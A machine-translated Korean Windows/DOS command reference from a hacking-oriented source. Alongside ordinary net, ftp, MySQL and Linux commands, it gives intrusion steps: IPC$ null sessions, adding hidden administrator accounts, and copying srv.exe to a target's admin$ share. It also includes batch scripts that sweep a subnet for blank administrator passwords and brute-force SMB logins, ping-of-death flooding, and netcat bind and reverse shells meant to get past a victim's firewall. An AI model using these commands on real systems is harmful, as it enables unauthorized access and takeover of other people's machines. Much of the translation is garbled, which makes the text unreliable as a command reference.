새 명령 프롬프트 창을 열려면 명령 프롬프트에 어떤 명령을 입력할 수 있나요?
DOS 명령 사전
net use \\ip\ipc$ " " /user:" " IPC 빈 링크 설정
net use \\ip\ipc $ "Password" /user:"Username" IPC 비어 있지 않은 링크 설정
net use h: \\ip\c$ "Password" /user:"Username" 로그인 후 상대방 C 매핑 직접 : 로컬 위치로 H :
net use h : \\ip\c$ 로그인 후 상대방을 매핑 C : 로컬 위치로 H :
net use \\ip\ipc$ /del IPC 링크 삭제
net use h: /del 상대방과 로컬 H:
net user 사용자 이름 비밀번호 매핑 삭제 /add 사용자 생성
net user guest /active:yes 게스트 사용자 활성화
net user 어떤 사용자인지 보기
net user 계정 이름 계정 속성 보기
net localgroup 관리자 사용자 이름 /add 관리자 권한을 갖도록 관리자에게 "user"를 추가합니다. 참고: 복수형을 사용하려면 관리자 뒤에 s를 추가하세요.
net start 어떤 서비스가 활성화되어 있는지 확인하세요.
net start service 서비스를 시작하는 이름(예: net start telnet, net start 일정)
서비스를 중지하는 net stop 서비스 이름
net time \\target ip 상대방 시간 확인
net time \\target ip /set "target IP" 호스트의 시간과 동기화되도록 로컬 컴퓨터 시간을 설정합니다. /yes 매개변수를 추가합니다. 확인 메시지 취소
net view 로컬 LAN*에서 활성화된 항목을 확인합니다. **공유
net view \\ip 다른 공유에서 활성화된 ***공유 보기 파티의 LAN
net 구성은 시스템 네트워크 설정을 표시합니다.
net 로그오프 연결 끊기 연결의 ***
net 일시 중지 서비스 이름은 서비스를 일시 중지합니다.
net send ip "문자 메시지"는 상대방에게 메시지를 보냅니다.
net ver은 LAN에 있습니다. 네트워크 연결 유형 및 사용된 정보
net share 로컬에서 보기 활성화됨 ** *share
순 공유 ipc$ ipc$***공유 활성화
순 공유 ipc$ /del 삭제 ipc$*** 즐기기
순 공유 c $ /del delete C:*** 즐겨
net user guest 12345 guest 사용자로 로그인한 후 비밀번호를 12345로 변경하세요.
net 비밀번호 비밀번호 시스템 로그인 비밀번호 변경
p>
netstat -a 어떤 포트가 열려 있는지 확인하기 위해 일반적으로 사용됨 netstat -an
netstat -n 포트를 확인하기 위해 네트워크 연결 상태, 일반적으로 사용됨 netstat -an
netstat -v 진행 중인 작업 보기
netstat -p 프로토콜 이름 예: netstat -p tcq/ip 특정 프로토콜의 사용 보기(tcp/ip 프로토콜 사용 확인)
netstat -s 사용 중인 모든 프로토콜의 사용량 확인
nbtstat -A ip 다른 포트 136~139 중 하나가 열려 있으면 상대방이 최근 로그인한 사용자 이름(1번)을 확인할 수 있습니다. 03 이전은 사용자 이름임) - 참고: 매개변수 -A는 대문자로 표기해야 합니다.
tracert - 매개변수 ip(또는 컴퓨터 이름) 추적 경로(패킷), 매개변수: "-w number"는 시간 초과 간격을 설정하는 데 사용됩니다.
Ping IP(또는 도메인 이름)는 기본 크기 32바이트의 데이터를 다른 호스트로 보냅니다. 매개변수: "-l [space] 패킷 크기"; "-n 데이터 전송 횟수" ; "-t "는 항상 핑을 보내는 것을 의미합니다.
ping -t -l 65550 ip ping of death(64K보다 큰 파일을 보내고 항상 ping을 보내는 것은 ping of death가 됨)
Windows NT 및 XP의 경우 ipconfig(winipcfg) (Windows 95 98) 로컬 IP 주소를 보기 위해 ipconfig는 "/all" 매개변수를 사용하여 모든 구성 정보를 표시할 수 있습니다.
tlist -t 프로세스를 트리 라인 목록으로 표시합니다(Windows 95 98의 경우 추가 도구입니다). 기본적으로 설치되지 않습니다.
kill -F 프로세스를 강제로 종료하려면 프로세스 이름에 -F 매개변수를 추가합니다. 기본적으로 설치되지 않는 시스템용 추가 도구는 설치 디렉토리 /tools 폴더의 지원에서)
del -F 파일 이름에 -F 매개 변수를 추가하여 읽기 전용 파일을 삭제합니다. . /AR, /AH, /AS 및 /AA는 각각 읽기 전용, 숨김 및 시스템 파일 삭제를 나타내며, /A-R, /A-H, /A-S, /A-A는 읽기 전용 파일 이외의 파일 삭제를 의미합니다. 전용, 숨김, 시스템 및 아카이브 파일. 예를 들어, "DEL/AR *.*"는 현재 디렉터리의 모든 읽기 전용 파일을 삭제한다는 의미이고, "DEL/A-S *.*"는 시스템 파일을 제외한 현재 디렉터리의 모든 파일을 삭제한다는 의미입니다.
del /S / Q 디렉토리 또는 rmdir /s /Q 디렉토리 /S를 사용하여 디렉토리와 디렉토리 아래의 모든 하위 디렉토리 및 파일을 삭제합니다. 동시에 /Q 매개변수를 사용하여 삭제 작업을 취소하고 시스템에서 확인한 후 바로 삭제합니다.
(두 명령 모두 같은 효과가 있습니다)
이동할 드라이브 문자\경로\이름, 이동한 파일이 저장된 경로\파일명 이동 후 매개변수 /y를 사용하여 확인을 취소합니다. 이동한 디렉터리에 동일한 파일이 존재하는지 확인하세요.
fc one.txt two.txt > 3st.txt 두 파일을 비교하여 차이점을 3st.txt 파일에 출력하세요. 및 "> >"는 중복됩니다.
id 번호에서 등록된 예약된 작업을 시작합니다.
/delete에서 모든 예약된 작업을 중지합니다. 확인 없이 직접 중지하려면 /yes 매개변수를 사용하세요.
at id number/delete 등록된 예약 작업 중지
at 모든 예약 작업 보기
at \\ip 시간 프로그램 이름(또는 명령) /r 특정 시간에 반대편에서 특정 프로그램을 실행하고 컴퓨터를 다시 시작
손가락 사용자 이름 @host를 사용하여 최근에 어떤 사용자가 로그인했는지 확인
텔넷 IP 포트 원격 및 로그인 서버, 기본 포트는 23입니다.
open ip가 IP에 연결됩니다(telnet 로그인 후 명령)
telnet 로컬 컴퓨터에 직접 telnet을 입력하여 로컬 telnet으로 들어갑니다.
copy path\file name 1 path\file name 2 /y 파일 1을 지정된 디렉터리에 파일 2로 복사합니다. 매개변수 /y를 사용하여 기존 디렉터리 파일을 덮어쓰겠다는 확인을 취소합니다.
copy c:\srv.exe \ \ip\admin$ 로컬 c:\srv.exe를 상대방 관리자에게 복사
cppy 1st.jpg/b+2st.txt/a 3st.jpg 내용 숨기기 jpg에서 3st.jpg라는 새 파일을 생성합니다. 참고: 2st.txt 파일 헤더에는 3개의 빈 행이 있어야 합니다. 매개변수: /b는 바이너리 파일을 나타내고, /a는 ASCLL 형식 파일을 나타냅니다. /p>
copy \\ip\admin$ \svv.exe c:\ 또는:copy\\ip\admin$\*.* 상대방의 admin$이 공유한 srv.exe 파일(모든 파일)을 복사합니다. *** 로컬 C로:
xcopy 복사할 파일 또는 디렉토리 트리의 대상 주소\파일을 복사할 디렉토리 이름 및 디렉토리 트리, 프롬프트 없이 동일한 파일을 덮어쓰려면 /Y 매개변수를 사용하십시오.
tftp -i 자신의 IP(미트머신을 발판으로 사용할 때 사용함) 머신IP) get server.exe c:\server.exe 로그인 후 "IP"의 server.exe를 다운로드 "를 대상 호스트 c:\server.exe 매개변수: -i는 exe 파일을 전송할 때와 같이 바이너리 모드로 전송한다는 의미입니다. , -i를 추가하지 않으면 전송은 ASCII 모드(텍스트 파일 전송 모드)로 이루어집니다.
tftp -i 상대방 IP 넣어 c:\server.exe 로그인 후 로컬 c:\server.exe를 호스트에 업로드
ftp ip 포트는 사용 서버에 파일을 업로드하거나 파일 작업을 수행하려면 기본 포트는 21입니다. bin은 바이너리 모드(실행 파일 입력)에서의 전송을 의미하며 기본값은 ASCII 형식 전송(텍스트 파일)입니다.
route print는 주로 네트워크 주소 네트워크 주소 및 서브넷 마스크를 표시하는 IP 경로를 표시합니다. 넷마스크, 게이트웨이 주소 게이트웨이 주소, 인터페이스 주소 인터페이스
arp ARP 캐시를 보고 처리합니다. ARP는 이름 확인을 의미하며 IP를 물리적 MAC 주소로 구문 분석하는 역할을 합니다.
arp -a는 모든 정보를 표시합니다.
프로그램 이름 또는 명령을 시작합니다. /max 또는 /min을 사용하여 새 창을 열고 프로그램 또는 명령을 최대화(최소화) 실행합니다.
mem CPU 사용량 보기
attrib 파일 이름(디렉터리 이름) 파일(디렉터리)의 속성 보기
attrib 파일 이름-A -R -S -H 또는 +A +R + S +H 특정 파일의 아카이브, 읽기 전용, 시스템 및 숨겨진 속성을 제거(추가)합니다. +를 사용하여 특정 속성으로 추가합니다.
dir 파일 보기, 매개변수: /Q는 파일이 어느 시스템에 있는지 표시합니다. 디렉토리는 사용자에게 속하며, /T:C는 파일 생성 시간을 표시하고, /T:A는 파일에 마지막으로 액세스한 시간을 표시하고, /T:W 마지막 수정 시간을 표시합니다.
date /t, time /t 이 매개변수를 사용하세요. "DATE/T", "TIME/T"는 새로운 날짜와 시간을 입력할 필요 없이 현재 날짜와 시간만 표시합니다.
set 환경 변수 이름을 지정하세요. 변수에 할당됨 환경 변수 설정
p>set은 모든 현재 환경 변수를 표시합니다.
set p(또는 다른 문자)는 문자 p(또는 다른 문자)로 시작하는 모든 현재 환경 변수를 표시합니다. )
pause 배치 프로그램을 일시 중지하고 표시합니다. 계속하려면 아무 키나 누르십시오....
일괄 프로그램에서 조건부 처리를 수행하는 경우(자세한 지침은 명령 및 변수 참조) )
goto 레이블은 cmd.exe를 배치 프로그램의 레이블이 지정된 줄로 지정합니다(레이블은 별도의 줄이어야 하며 앞에 콜론이 와야 합니다(예: ":start" 레이블))
호출 경로\배치 파일 이름 배치 프로그램 내에서 다른 배치 프로그램 호출(자세한 지침은 call /? 참조)
파일 집합의 각 파일에 대해 특정 명령을 실행합니다(참조: 명령 및 변수의 경우)
echo on 또는 off는 에코를 켜거나 끕니다. 매개변수 없이 에코만 사용하면 현재 에코 설정이 표시됩니다.
에코 정보가 화면에 표시됩니다. p>
echo information>> pass.txt "정보"를 pass.txt 파일에 저장
findstr "Hello" aa.txt aa.txt 파일에서 hello 문자열 찾기
파일을 찾기 위한 파일 이름 찾기
title title name은 CMD 창 제목 이름을 변경합니다.
color color 값은 cmd 콘솔의 전경색과 배경색을 설정합니다. , 1=파란색, 2= 녹색, 3=연한 녹색, 4=빨간색, 5=보라색, 6=노란색, 7=흰색, 8=회색, 9=연한 파란색, A=연한 녹색, B=연한 녹색, C =연한 빨간색, D= 연한 보라색, E=연한 노란색, F=밝은 흰색
프롬프트 이름은 cmd.exe에 의해 표시되는 명령 프롬프트를 변경합니다(C:\, D:\를 EntSky\로 변경).
ver는 DOS 창에 버전 정보를 표시합니다.
winver는 버전 정보(메모리 크기, 시스템 버전, 패치 버전, 컴퓨터 이름)를 표시하는 창을 표시합니다.
format 드라이브 문자/ FS: 포맷된 디스크를 입력하고, 유형: FAT, FAT32, NTFS, 예: 형식 D: /FS:NTFS
디렉토리를 생성할 md 디렉토리 이름
소스 교체 파일을 대체할 파일 디렉토리 대체 파일
ren 원래 파일 이름 새 파일 이름 파일 이름 바꾸기
tree 디렉토리를 트리 구조로 표시하고 -f 매개변수를 사용하여 파일을 나열합니다. 첫 번째 폴더의 이름
파일 이름 유형은 텍스트 파일의 내용을 표시합니다.
추가 파일 이름은 출력 파일을 화면별로 표시합니다.
doskey 명령은 잠긴 = 문자
doskey 명령을 잠금 해제하려면 = DOS용으로 제공되는 잠금 명령(명령줄 편집, win2k 명령 다시 호출,
매크로를 생성합니다). 예: lock dir 명령: doskey dir=entsky (doskey dir=dir을 사용할 수 없음); 잠금 해제: doskey dir=
taskmgr이 작업 관리자를 불러옵니다.
chkdsk /F D: 확인 디스크 D를 선택하고 상태 보고서를 표시합니다. /f 매개변수를 추가하고 디스크의 오류를 수정합니다.
tlntadmn telnt service admn, tlntadmn을 입력하고 3을 선택한 다음 8을 선택하면 텔넷 서비스 기본 포트를 변경할 수 있습니다. 23을 다른 포트로 연결
exit cmd.exe 프로그램이나 현재 프로그램을 종료합니다. cmd.exe 대신 현재 배치 스크립트를 종료하려면 /B 매개변수를 사용하세요.
path path\executable 파일 이름은 실행 가능합니다. 파일은 경로를 설정합니다.
cmd는 win2K 명령 해석 창을 시작합니다. 매개변수: /eff, /en 명령 확장을 끄고 켜십시오. 자세한 지침은 cmd /?를 참조하십시오.
regedit /s 레지스트리 파일 이름은 /S가 참조하는 매개변수로 가져옵니다. 프롬프트 없이 자동 모드 가져오기
regedit /e 레지스트리 파일 이름은 레지스트리를 내보냅니다.
cacls 파일 이름 매개변수는 파일 액세스 제어 목록(ACL)을 표시하거나 수정합니다(NTFS용). 체재. 매개변수: /D 사용자 이름: 특정 사용자에 대한 액세스를 거부하도록 설정합니다. /P 사용자 이름: perm은 지정된 사용자의 액세스 권한을 대체합니다. /G 사용자 이름: perm은 지정된 사용자에게 액세스 권한을 부여합니다. 읽기, W 쓰기, C 변경(쓰기), F는 완전히 제어합니다. 예: cacls D:\test.txt /D pub는 d:\test.txt를 pub 사용자 액세스를 거부하도록 설정합니다.
파일 액세스 사용자 권한 목록을 보기 위한 cacls 파일 이름
배치 파일에 주석을 추가하기 위한 REM 텍스트 콘텐츠
로컬 네트워크를 보거나 변경하기 위한 netsh 구성
IIS 서비스 명령:
iisreset /reboot win2k 컴퓨터를 다시 시작합니다(그러나 시스템이 다시 시작된다는 메시지가 표시됨)
iisreset /start 또는 stop 모든 인터넷 서비스 시작(중지)
iisreset /restart 모든 인터넷 서비스 중지 및 다시 시작
iisreset /status 모든 인터넷 서비스 상태 표시
iisreset /enable 또는 로컬 시스템에서 비활성화 인터넷 서비스 재시작 활성화(비활성화)
iisreset /rebootonerror 인터넷 서비스를 시작, 중지 또는 다시 시작할 때 오류가 발생하면 재부팅됩니다
iisreset /noforce 인터넷 서비스를 중지할 수 없는 경우 인터넷 서비스가 강제 종료되지 않습니다.
iisreset /timeout Val이 시간 초과 기간(초)에 도달해도 인터넷 서비스를 중지하지 않았습니다. Rebootonerror 매개변수가 지정되면 컴퓨터가 다시 시작됩니다. 기본값은 다시 시작하는 데 20초, 중지하는 데 60초, 다시 시작하는 데 0초입니다.
FTP 명령: (자세한 내용은 나중에 설명됩니다.)
ftp의 명령줄 형식은 다음과 같습니다:
ftp -v -d -i -n -g[ 호스트 이름] -v는 원격 서버의 모든 응답 정보를 표시합니다.
-d는 디버깅 모드를 사용합니다.
-n은 ftp의 자동 로그인을 제한합니다. 즉, .netrc 파일을 사용하지 않습니다.
-g 전역 파일 이름을 취소합니다.
help [명령어] 또는 ? [명령] 명령 설명 보기
bye 또는 quit는 호스트 FTP 프로세스를 종료하고 FTP 관리 모드를 종료합니다.
pwd는 현재 원격 호스트 디렉터리를 나열합니다.
put 또는 send 로컬 파일 이름 [호스트에 업로드된 파일 이름]을 통해 로컬 파일을 원격 호스트로 전송
get 또는 recv [원격 호스트 파일 이름] [로컬에 다운로드된 파일 이름] from Transfer a 원격 호스트에서 로컬 호스트로 파일 배치
mget [remote-files] 원격 호스트에서 로컬 호스트로 파일 배치 수신
local-files 전송 로컬 호스트로 파일 배치 원격 호스트로 파일 전송
dir 또는 ls [remote-directory] [local-file]은 현재 원격 호스트 디렉토리에 파일을 나열합니다. 로컬 파일이 있으면 씁니다. 결과를 로컬 파일로 전송
ascii ASCII 모드로 파일을 전송하도록 설정(기본값)
bin 또는 image 바이너리 모드로 파일을 전송하도록 설정
bell 파일 전송이 완료될 때마다 알람 프롬프트
cdup이 이전 디렉터리로 돌아갑니다.
close는 원격 서버와의 ftp 세션을 중단합니다(open에 해당).
open host[port]는 지정된 FTP 서버 연결을 설정하고 연결 포트를 지정할 수 있습니다.
delete는 원격 호스트에 있는 파일을 삭제합니다.
mdelete [remote-files]는 일괄 삭제합니다. files
mkdir 디렉토리 이름 원격 호스트에 디렉토리 생성
이름 바꾸기 [from] [to] 원격 호스트에 있는 파일 이름 변경
rmdir 디렉토리 -name 원격 호스트의 디렉터리 삭제
status는 현재 FTP 상태를 표시합니다.
system은 원격 호스트 시스템 유형을 표시합니다.
user user-name [password] [계정] 다른 사용자 이름으로 원격 호스트에 다시 로그인 호스트
호스트 열기 [포트] 새 연결 다시 설정
프롬프트 대화형 프롬프트 모드
macdef 정의 매크로 명령
lcd 변경 로컬 호스트의 현재 작업 디렉토리. 기본값인 경우 현재 사용자의 HOME 디렉토리로 이동합니다.
chmod는 원격 호스트의 파일 권한을 변경합니다.
case ON일 때 MGET 명령을 사용합니다. 파일 이름을 로컬 컴퓨터에 복사하고 모두 소문자로 변환합니다.
cd remote-dir은 원격 호스트 디렉터리로 들어갑니다
cdup은 원격 호스트 디렉터리의 상위 디렉터리로 들어갑니다
! 로컬 시스템에서 대화형 셸을 실행하고 종료한 후!ls*.zip과 같은 ftp 환경으로 돌아갑니다.
#5 다섯:
MYSQL 명령:
mysql -h 호스트 주소 -u 사용자 이름 -p MYSQL에 연결하기 위한 비밀번호, MYSQL이 방금 설치된 경우 슈퍼 사용자 루트에는 비밀번호가 없습니다.
(예: mysql -h110.110.110.110 -Uroot -P123456
참고: u와 root는 공백을 추가할 필요가 없으며 다른 경우에도 동일하게 적용됩니다)
exit MYSQL 종료
mysqladmin -u 사용자 이름 -p 이전 비밀번호 비밀번호 새 비밀번호 비밀번호 변경
데이터베이스에서 선택 권한 부여.* 사용자 이름@로그인 호스트는 \"password\로 식별됨 "; 새로운 사용자를 추가합니다.
(참고: 다음은 위와 달리 MYSQL 환경의 명령이므로 뒤에 명령 종결자로 세미콜론이 붙습니다.)
showdatabases; 처음에는 mysql과 test라는 두 개의 데이터베이스만 있었습니다. mysql 라이브러리는 매우 중요합니다. 여기에는 MYSQL 시스템 정보가 포함되어 있으며 비밀번호를 변경하고 새 사용자를 추가할 때 실제로 이 라이브러리를 사용합니다.
mysql을 사용합니다.
라이브러리의 데이터 테이블을 표시합니다.
데이터 테이블의 구조를 표시합니다. p>데이터베이스 생성; 데이터베이스 생성
데이터베이스 이름 사용
테이블 이름 생성(필드 설정 목록)
데이터베이스 데이터베이스 이름 삭제 ;
테이블 테이블 이름 삭제; 테이블 이름에서 삭제
테이블 이름에서 *를 선택; 테이블의 데이터 Record
mysqldump --opt school>school.bbb 데이터베이스 백업: (명령은 DOS의 \\mysql\\bin 디렉터리에서 실행됩니다.) 참고: 데이터베이스 학교를 다음 위치에 백업하세요. school.bbb 파일, school.bbb는 텍스트 파일입니다. 파일 이름을 선택하여 새로운 내용을 찾을 수 있는지 확인하세요.
win2003 시스템의 새로운 명령(실제 부분):
shutdown /parameter 로컬 또는 원격 호스트를 종료하거나 다시 시작합니다.
매개변수 설명: /S는 호스트 종료, /R은 호스트 다시 시작, /T는 지연 시간을 0~180초 범위에서 디지털 방식으로 설정, /A는 부팅 취소, /M //IP는 원격 지정 주인.
예: shutdown /r /t 0 로컬 호스트를 즉시 다시 시작합니다(지연 없음)
taskill /parameter 프로세스 이름 또는 프로세스 pid 하나 이상의 작업과 프로세스를 종료합니다.
매개변수 설명: /PID는 종료할 프로세스의 pid이고, tasklist 명령을 사용하여 각 프로세스의 pid를 얻을 수 있으며, /IM은 종료할 프로세스의 프로세스 이름, / F는 프로세스를 강제 종료하는 것이고, /T는 지정된 프로세스와 그가 시작한 하위 프로세스를 종료하는 것입니다.
tasklist는 로컬 및 원격 호스트에서 현재 실행 중인 각 서비스 프로세스의 프로세스, 서비스 및 프로세스 식별자(PID)를 표시합니다.
매개변수 설명: /M은 현재 프로세스에서 로드한 dll 파일을 나열하고, /SVC는 각 프로세스에 해당하는 서비스를 표시합니다. 매개변수가 없으면 현재 프로세스만 나열됩니다.
#6 6:
Linux 시스템의 기본 명령: 대소문자 구분
uname은 버전 정보를 표시합니다(win2K 버전과 동일)
dir은 현재 디렉토리에 있는 파일을 표시하고, ls -al은 숨겨진 파일을 표시합니다(win2K의 dir과 동일)
pwd는 현재 디렉토리 위치를 쿼리합니다.
cd cd ..이전 페이지로 돌아가기 레이어 디렉토리, cd와 ... 사이에 공백이 있다는 점에 유의하세요. cd /루트 디렉터리로 돌아갑니다.
cat 파일명 파일 내용 보기
cat >abc.txt abc.txt 파일에 내용을 씁니다.
more filename 텍스트 파일을 페이지별로 표시합니다.
cp 파일 복사
mv 파일 이동
rm file name은 파일 삭제, rm -a 디렉토리 이름은 디렉토리 및 하위 디렉토리 삭제
mkdir 디렉토리 이름은 디렉토리를 생성합니다.
rmdir은 하위 디렉토리를 삭제하고 디렉토리에 문서가 없습니다.
chmod는 파일이나 디렉터리의 액세스 권한을 설정합니다.
grep은 파일에서 문자열을 검색합니다.
diff 파일 비교
find 파일 검색
date 현재 날짜 및 시간
현재 동일한 기기를 사용하고 있는 사람과 로그인 시간 및 위치를 쿼리하는 사람
w 현재 사용자를 쿼리하는 세부 정보
whoami 계정 이름 보기
groups 다른 사람의 그룹 보기
passwd 비밀번호 변경
기록 자신의 전달된 명령 보기
ps는 프로세스 상태를 표시합니다
kill은 프로세스를 중지합니다
gcc 해커는 일반적으로 C 언어로 작성된 파일을 컴파일하는 데 이를 사용합니다.
Su 권한은 지정된 사용자로 전환됩니다.
telnet IP telnet이 다른 호스트에 연결됩니다(win2K와 동일). bash$가 나타나면 연결에 성공한 것입니다.
ftp ftp는 서버에 연결합니다(win2K와 동일)
첨부: 배치 명령 및 변수
1: 명령 및 변수의 기본 형식:
p >
FOR /parameter%variable IN (set) DO 명령 [command_parameters] %variable: %i와 같이 대체 가능한 단일 문자 매개변수를 지정하고 %%i로 변수를 지정합니다. 변수 사용: %i%, 변수는 대소문자를 구분합니다(%i는 %I와 동일하지 않음).
일괄 처리는 매번 %0에서 %9***10개의 변수를 처리할 수 있으며, 그 중 %0은(는) 기본적으로 배치 파일 이름이고, %1은(는) 이 일괄 처리를 사용할 때 입력한 이름이 기본값입니다. 마찬가지로 첫 번째 값: %2-%9는 입력된 2-9번째 값을 나타냅니다. 예: net use \\ip\ipc$ pass /user:user 여기서 ip는 %1, pass는 %2, user %3
(세트): 하나 또는 파일 그룹을 지정합니다. 다음과 같은 와일드카드를 사용할 수 있습니다: (D:\user.txt) 및 (1 1 254) (1 -1 254), { " (1 1 254)" 첫 번째 "1"은 시작 값을 나타내고 두 번째 "1"은 증가를 나타내며 세 번째 "254"는 최종 값, 즉 1부터 254까지를 나타냅니다. -1 254 )" 설명: 254에서 1까지 }
명령: 파일에서 실행할 명령을 지정합니다(예: net use 명령; 여러 명령을 실행하려면 &를 추가). 명령을 분리합니다.
command_parameters: 특정 명령에 대한 매개변수 또는 명령줄 스위치를 지정합니다.
IN(set): (set)에서 값을 가져오는 것을 나타냅니다. 명령 실행
매개변수: /L은 증분 형식을 사용한다는 의미입니다. {(설정)이 증분 형식일 때} /F는 파일이 완료될 때까지(설정) 계속해서 파일에서 값을 가져오는 것을 의미합니다. (d:\ pass.txt)}와 같은 파일입니다.
사용 예:
@echo off
echo 사용 형식: test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "명령이 성공적으로 완료되었습니다" >>test .txt
test.bat로 저장 설명: 지정된 클래스 C 네트워크 세그먼트의 254개 IP에 대해 빈 관리자 비밀번호를 사용하여 IPC$ 연결을 설정해 봅니다. 성공하면 IP를 test.txt에 저장합니다. 가운데.
/L은 증분 형식(예: 1-254 또는 254-1)을 나타냅니다. 입력 IP의 처음 세 자리: *.*.*는 일괄 처리의 기본값 %1입니다. %G는 변수(ip의 마지막 숫자)입니다. &는 두 명령을 구분하는 데 사용됩니다. echo와 net 사용은 ipc$를 만든 후 결과에서 "명령이 성공적으로 완료되었습니다" 메시지가 있는지 확인하는 것을 의미합니다. ; %1.% %G는 전체 IP 주소(1 1 254)이며 시작 값, 증가량 및 끝 값을 나타냅니다.
@echo off
echo 사용 형식: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb. exe %1 %%i D:\pass.dic 200
다른 이름으로 저장: ok.exe 설명: IP를 입력한 후 d:\pass.dic 사전 파일을 사용하여 d:\user를 해독합니다. 파일의 값이 소진될 때까지 dic의 사용자 비밀번호입니다. %%i는 사용자 이름이고 %1은 입력된 IP 주소입니다(기본값).
#7 7:
2: if 명령 및 변수의 기본 형식:
IF [not] 오류 수준 숫자 명령문 프로그램이 실행되고 최종적으로 반환되는 경우 지정된 숫자보다 크거나 같은 값이고 지정된 조건이 "true"입니다.
예: IF errorlevel 0 명령은 프로그램 실행 후 반환된 값이 0일 때 해당 줄 이후의 명령이 실행됨을 의미하고, errorlevel 1 명령이 아닌 경우 프로그램 실행 후 반환된 값이 동일하지 않음을 의미합니다. 1로 설정하면 다음 명령이 실행됩니다.
0은 검색되어 성공적으로 실행되었음을 의미하고(true), 1은 검색 및 실행되지 않았음을 의미합니다(false).
IF [not] String 1==String 2 명령문 지정된 텍스트 문자열이 일치하면(즉, 문자열 1이 문자열 2와 같음) 다음 명령이 실행됩니다.
예: "if "%2%"=="4" goto start"는 입력한 두 번째 변수가 4인 경우 다음 명령을 실행합니다(참고: 변수 호출 시 % 변수 이름 사용). % 및 " " 추가)
IF [not] 파일 이름 명령문 지정된 파일 이름이 존재하는 경우 다음 명령이 실행됩니다.
예: "nc.exe가 아니면 goto end"는 nc.exe 파일을 찾을 수 없으면 ":end" 태그로 이동한다는 의미입니다.
IF [not] errorlevel 숫자 명령문 else 명령문 또는 IF [not] 문자열 1==string 2 명령문 else 명령문 또는 IF [not]exist 파일 이름 명령문 else 명령문 plus 위: else 명령문 뒤는 다음을 참조합니다. 이전 조건이 true가 아닌 경우 else 뒤의 명령을 참조합니다. 참고: else 는 유효하려면 같은 줄에 있어야 합니다.
del 명령이 있는 경우 del 명령의 전체 내용을 < >로 묶어야 합니다. 왜냐하면 del 명령은 별도의 줄에서만 실행할 수 있기 때문입니다. < >를 사용한 후에는 별도의 줄과 동일합니다. "test.txt가 존재하는 경우 else echo test.txt.missing", 명령의 "."에 주의하세요.
(2) 시스템 외부 명령(둘 다 다운로드 필요) 관련 도구):
1 , Swiss Army Knife: nc.exe
매개변수 설명:
-h 도움말 정보 보기
- d 백그라운드 모드
-e prog 연결이 되자마자 실행되는 프로그램 리디렉션 [위험]
-i 초 지연 간격
-l 청취 모드 , 인바운드 연결에 사용됨
-L 모니터링 모드, 연결이 종료된 후에도 CTR+C까지 계속 모니터링
-n IP 주소, 도메인 이름을 사용할 수 없음
-o 영화는 16진수 전송을 기록합니다.
p>
-p[space]포트 로컬 포트 번호
-r 임의 로컬 및 원격 포트
-t Telnet 상호 작용 모드 사용
-u UDP 모드
-v 자세한 출력, -vv를 사용하여 더 자세히 설명
-w 디지털 시간 초과 지연 간격
-z는 입력 및 출력을 끕니다(앵커를 스윕하는 데 사용되는 경우)
기본 사용법:
nc -nvv 192.168.0.1 80 포트 80에 연결 192.168.0.1 호스트의
nc -l - p 80 로컬 TCP 포트 80을 열고 수신
nc -nvv -w2 -z 192.168.0.1 80-1024 80 스윕 -192.168.0.1의 1024 포트
nc - l -p 5354 -t -e c:winntsystem32cmd.exe 원격 호스트의 cmdshell을 원격 TCP 5354 포트에 바인딩합니다.
nc - t -e c:winntsystem32cmd.exe 192.168.0.2 5354 원격 호스트의 cmdshell을 바인딩하고 역방향으로 192.168.0.2의 포트 5354에 연결합니다.
고급 사용법:
nc -L -p 80 1을 허니팟으로 사용: nc -L -p까지 CTR +C까지 포트 80을 열고 모니터링합니다. 80 > c:\log.txt 2를 허니팟으로 사용: CTR+C까지 포트 80을 열고 지속적으로 모니터링하고 결과를 c:\log.txt
nc -L -p 80 < c:\honeyport.txt 허니팟으로 사용: 3-1을 허니팟으로 사용: CTR+C가 될 때까지 포트 80을 계속 열고 듣고 다음을 입력합니다. c: \honeyport.txt의 콘텐츠는 파이프라인으로 전송되며 파일 전송에도 사용할 수 있습니다.
type.exe c:\honeyport | nc -L -p 80 3-2를 허니팟으로 사용 : 열기는 CTR+C까지 포트 80을 계속 모니터링하지 않으며 c:\honeyport.txt의 콘텐츠를 파이프로 보냅니다. 이는 파일 전송에도 사용할 수 있습니다.
이 컴퓨터에서 사용: nc - l -p 로컬 포트
다른 호스트에서 사용: nc -e cmd.exe 로컬 IP -p 로컬 포트 *win2K
nc -e /bin/sh 로컬 IP - p 로컬 포트 *linux, unix 다른 호스트의 방화벽을 뚫기 위한 역방향 연결
로컬 시스템에서 사용: nc -d -l -p 로컬 포트 <전송할 파일의 경로 및 이름
상대방 호스트에서 사용 : nc -vv 로컬 IP 로컬 포트> 저장소
파일의 경로와 이름. 상대방의 호스트로 파일을 전송합니다.
비고:
| 파이프라인 명령
< 또는 > 리디렉션 명령입니다. "<", 예: tlntadmn < test.txt는 test.txt의 내용을 tlntadmn 명령에 할당한다는 의미입니다.
@는 @ 다음에 명령을 실행하지만 표시되지는 않는다는 의미입니다(백그라운드 실행). 예: @ dir c:\winnt >> d:\log.txt는 다음을 의미합니다. 백그라운드에서 dir을 실행하고 결과를 d:\log.txt에 저장합니다.
>>>>>의 차이점은 다음과 같습니다. "는 덮어쓰기를 의미합니다. ">>"는 다음에 저장(추가)을 의미합니다.
예: @dir c:\winnt >> d:\log.txt 및 @dir c:\winnt > d:\log.txt 두 명령을 각각 실행하여 비교합니다. use >> 결과 두 번째 결과가 저장되지만 :>의 결과는 두 번째 결과가 첫 번째 결과를 덮어쓰기 때문에 첫 번째 결과일 뿐입니다.
#8 여덟 번째:
2. 앵커 스캐닝 도구: xscan.exe
기본 형식
xscan -host <시작 IP> [-<끝 IP>] <탐지 항목> [기타 옵션] "시작 IP ~ 끝 IP" 세그먼트의 모든 호스트 정보 검사
xscan -file <호스트 목록 파일 이름> <탐지 항목> [ 기타 옵션] "호스트 IP 목록 파일명"의 모든 호스트 정보 검사
탐지 항목
-active 호스트가 살아 있는지 확인
-os Detect 원격 운영 체제 유형(NETBIOS 및 SNMP 프로토콜을 통해)
-port 일반적으로 사용되는 서비스의 포트 상태 감지
-ftp FTP 취약 비밀번호 감지
- pub FTP 서비스 익명 사용자 쓰기 권한 감지
-pop3 POP3-서버 취약한 비밀번호 감지
-smtp SMTP-서버 취약점 감지
-sql SQL-Server 감지 취약한 비밀번호
-smb는 NT-서버 취약한 비밀번호를 감지합니다.
-iis는 IIS 인코딩/디코딩 취약성을 감지합니다.
